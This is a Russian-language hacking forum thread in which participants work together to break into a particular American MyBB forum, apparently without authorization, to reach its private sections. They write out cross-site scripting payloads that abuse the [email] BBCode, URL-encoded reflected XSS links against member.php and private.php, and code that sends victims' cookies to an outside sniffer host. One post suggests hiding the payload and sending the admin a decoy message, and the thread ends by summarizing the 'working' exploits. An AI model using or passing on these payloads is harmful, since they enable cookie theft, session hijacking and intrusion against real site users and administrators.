Уязвимость движка MyBB

Всем привет, парни нужна помощ, такая ситуация, есть один форум, который имеет приватные разделы, переюзал множество сплоитов, в версии форума еще не уверен, в админке пишет MyBB 1.1, может ктонить чтонить посоветует, может инъекции есть? Ну вовсем кидайте сюда все, буду очень признателен. Если есть такие кто может помоч мне в деле, то стукните в асю (858476) там и спишемся.

 

Возможно админ умный и прикрыл все дыры. Вот и сплойты не работают, а может руки такие.

 

Если это на рухелпе то там дырки закрыты.
По крайней мере на ipb 1.3 final сплойт не сработал.

 

Парни, ну не эжто мы так просто сдадимся??? Ведь не уязвимых движков не существует. Форум американских юзеров. Поэтому врядли что либо они делали, вндь юзер по безопасности поставил бы аундификацую на админку, а там так просто все стоит, да и юзеров зарегино не много, кинтьсе линк на рабочии сплоиты (а то обычно с ошибками пишутся) буду очень признателен. Боюсь оставить линк жертвы, если кто может посмотреть, то кину в пм.

 

О да, парни я это сделал, хсс прокатило, вот сам код есди кому интересно
[*code][*email=a"onmousemove="*alert(document.cookie);"[email protected]]Нажми сюда![*/email][*/code]
(Без *)

 

Неуязвимых движков нет.

Ты линк дай на форум.

 

Линк я тебе отправил в ПМ
----------------------------------------------------------------------
Люди теперь я сдаюсь, сплоит

Code:

[*code][*email=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![*/email][*/code]

работает (естественно без звездочек) а вот под сниффер чтоб работал мозгов не хватает, нужна срочно помощь (плизззз)

 

Code:

[*code][*email=a"onmousemove="img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"[email protected]]Нажми сюда![*/email][*/code]

Поробуй так ))) Если у тебя код рабочий )))

 

Пробовал, там еще нужно <script> закодировать, но на ковычки фильтр стоит, вот думаю как их обнануть
Сплоит

Code:

[*code][*email=a"onmousemove="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>;"[email protected]]sex[*/email][*/code]

Исходник.

Code:

"><a href="mailto:a"onmousemove="&lt;script&gt;img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;&lt;/script&gt;;"[email protected]">sex</a></div><br />

Как вижу фильтр стоит на ковычки <> вот терь такой вопрос, как можно обойти фильтр на ковычки?

 

для активного хавтило бы только этого

Code:

[*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"[email protected]]sex[*/email][*/code]

будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:

Code:

[*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`[email protected]]sex[*/email][*/code]

 

Хммм что то всеравно не то, получаю такой исходник

Code:

>[c ode][e mail=a&quot;style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+(document.cookie);this.sss=null`[email protected] ]sex[/e mail][/c ode]</textarea>

Не могу понять, почему код алерта работает
[c ode][e mail=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![/e mail][/c ode]
Хотя на выходи я вижу вот что:
<a href="mailto:a"onmousemove="alert(document.cookie);"[email protected]">Нажми сюда!</a></div><br />
Чтож такое, люди, может кто знает?

 

Romaxa55, кинь в пм ссылку на сайт? А активный xss тоже не сраотал? Странно....

 

Вот что у меня заработало, межсайтовый скиптинг но какз наете не совсем удобно его юзать админ не так уж глуп чтоб юзать линки незнакомые. Хотеловсь бы что нить с бб кодами, но выше приведеные советы не помогли, везде чтонить да фильтруется. Может можно вставить код который при наведение мыши не алер вылетал а окрытие страницы происходило?? Вот пример сплоитов:

Code:

http://forum.host/member.php?action=do_login&username=(Login]&password={pass}&url=">%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

Code:

http://forum.host/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Eimg%20=%20new%20Image();%20img.src%20=%20"%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65;%3C/script%3E&preview=Preview

[mod]Убедительная просьба ко всем: Вместо тэга

 

я з@#$%^ся его подбирать.... вот пассивный xss ...

HTML:

[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"[email protected]]Нажми сюда![/email*][/code*]

добавлено позже:
можно в style добавить style=visibility:hidden; и написать админу вообще левую телегу ... он даже и не подумает что в сообщений может быть что-то потенциально опасное...

 

Хочу выразить огромную благодарность Cheburek'у!!!
И давайте подвидем итоги по уязвимости MyBB v1.10

Рабочие XSS:
с Алертом

Code:

[code*][email=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![/email*][/code*]

Со сниффером:

Code:

[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"[email protected]]Нажми сюда![/emai*l][*/code]

P.S. При использывании кода необходимо убрать звездочки!


Тема может быть закрыта!

 

Не работают эти эксплойты, так как стоит фильтрация на ковычки и Bb коды